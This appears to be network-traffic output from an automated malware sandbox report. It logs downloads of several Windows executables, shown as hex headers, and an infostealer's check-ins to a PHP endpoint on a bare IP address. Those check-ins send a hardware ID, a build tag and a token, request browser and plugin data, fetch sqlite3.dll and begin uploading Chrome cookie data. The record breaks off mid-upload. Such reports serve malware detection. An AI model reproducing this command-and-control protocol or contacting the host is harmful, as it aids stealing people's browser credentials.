Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:25:11 GMTContent-Type: application/octet-streamContent-Length: 1876480Last-Modified: Sat, 27 Jul 2024 06:54:41 GMTConnection: keep-aliveETag: "66a499b1-1ca200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 f9 d2 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 57 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 57 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 77 74 67 69 75 79 6e 00 90 19 00 00 d0 30 00 00 8a 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 72 62 79 7a 70 77 63 00 10 00 00 00 60 4a 00 00 04 00 00 00 7c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 80 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:25:13 GMTContent-Type: application/octet-streamContent-Length: 1897984Last-Modified: Sat, 27 Jul 2024 06:55:15 GMTConnection: keep-aliveETag: "66a499d3-1cf600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 90 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 1c 10 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 76 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 63 78 73 66 7a 68 73 00 e0 19 00 00 a0 31 00 00 da 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6c 7a 66 6b 64 61 63 00 10 00 00 00 80 4b 00 00 06 00 00 00 ce 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4b 00 00 22 00 00 00 d4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:25:13 GMTContent-Type: application/octet-streamContent-Length: 1897984Last-Modified: Sat, 27 Jul 2024 06:55:15 GMTConnection: keep-aliveETag: "66a499d3-1cf600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 90 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 1c 10 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 76 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 63 78 73 66 7a 68 73 00 e0 19 00 00 a0 31 00 00 da 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6c 7a 66 6b 64 61 63 00 10 00 00 00 80 4b 00 00 06 00 00 00 ce 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4b 00 00 22 00 00 00 d4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:26:05 GMTContent-Type: application/octet-streamContent-Length: 250368Last-Modified: Sat, 27 Jul 2024 07:22:24 GMTConnection: keep-aliveETag: "66a4a030-3d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 64 67 94 73 20 06 fa 20 20 06 fa 20 20 06 fa 20 4f 70 51 20 3b 06 fa 20 4f 70 64 20 30 06 fa 20 4f 70 50 20 44 06 fa 20 29 7e 69 20 2b 06 fa 20 20 06 fb 20 55 06 fa 20 4f 70 55 20 21 06 fa 20 4f 70 60 20 21 06 fa 20 4f 70 67 20 21 06 fa 20 52 69 63 68 20 06 fa 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 ad 62 40 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 78 03 02 00 00 00 00 f9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 08 5b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 59 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 18 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4a 33 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 6f 77 6f 00 00 00 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6e 61 64 65 00 00 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:26:08 GMTContent-Type: application/octet-streamContent-Length: 3248128Last-Modified: Sat, 27 Jul 2024 06:53:52 GMTConnection: keep-aliveETag: "66a49980-319000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 63 99 a4 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 c6 08 00 00 00 00 00 f8 81 af 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 af 00 00 04 00 00 db a2 12 00 02 00 40 80 00 00 80 00 00 20 00 00 00 00 80 00 00 20 00 00 00 00 00 00 10 00 00 00 50 40 8d 00 2b 0e 00 00 7c 4e 8d 00 4c 04 00 00 00 d0 12 00 e8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 8d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 00 10 00 00 00 00 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 03 00 00 c0 09 00 00 f2 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 0c 00 00 04 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 05 00 00 40 0d 00 00 f6 04 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 50 12 00 00 62 00 00 00 f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 90 00 00 00 d0 12 00 00 8e 00 00 00 52 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 b0 79 00 00 60 13 00 00 28 03 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 90 22 00 00 10 8d 00 00 88 22 00 00 08 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBKHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 41 41 32 45 43 42 43 45 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 2d 2d 0d 0a Data Ascii: ------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="hwid"25AA2ECBCE684217651120------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="build"sila------EHDGIJJDGCBKFIDHIEBK--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJDHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="message"browsers------FBKJDGCGDAAAKECAKKJD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 2d 2d 0d 0a Data Ascii: ------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="message"plugins------KEGCBFCBFBKFHIECAFCF--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="message"fplugins------HJJJDAEGIDHCBFHJJJEG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEGHost: 85.28.47.31Content-Length: 7495Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 